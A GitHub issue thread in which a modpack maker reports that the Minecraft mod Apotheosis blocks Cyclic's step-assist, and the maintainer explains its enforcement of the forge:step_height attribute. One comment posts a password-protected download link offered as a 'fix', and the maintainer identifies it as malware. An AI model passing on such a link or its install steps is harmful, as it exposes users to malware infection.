### ISSUE TITLE
cyclic step assist incompatibility

### ISSUE THREAD

**Issue by TheHAWKERX** [Shadows-of-Fire/Apotheosis#1338]
I made a modpack  and noticed that cyclic's step assist feature ( apple of lofty stature ) can't make me go up a block automatically (step assist isn't working) 
so I boiled down the problem by spending hours removing mods and adding and turns out apotheosis overrides the mechanism for step height (or something) and cyclic can't change it 

 minecraft version 1.19.2

 forge 43.4.0

nothing relative to this problem I have found in the logs neither debug or other logs

I would like to have the option to choose between the step assist mechanisms of these two mods because I personally would prefer step assist to be something permanent and without having to disabling a whole module of this awesome mod

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by Shadows-of-Fire** [comment]
(the prior comment was malware)

**Comment by TheHAWKERX** [comment]
> (the prior comment was malware)

thank you for your care about the comment section

to what regards the incompatibility ; i appreciate the work you do and the time dedicated to this project but I respect your personal life and your personal time so please take all the time you need and don't rush ,this isn't important to be fixed immediately .

sincerely
thanks for your lovely creation

**Comment by Shadows-of-Fire** [comment]
Apoth enforces use of the `forge:step_height` attribute (which was made mandatory by forge later, and then by vanilla when they added it). There are no workarounds to this enforcement, the solution would be for cyclic to properly use the attribute instead of modifying `maxUpStep`.

Given this is 1.19, I suppose that will never happen, as I doubt cyclic is updating for that version.
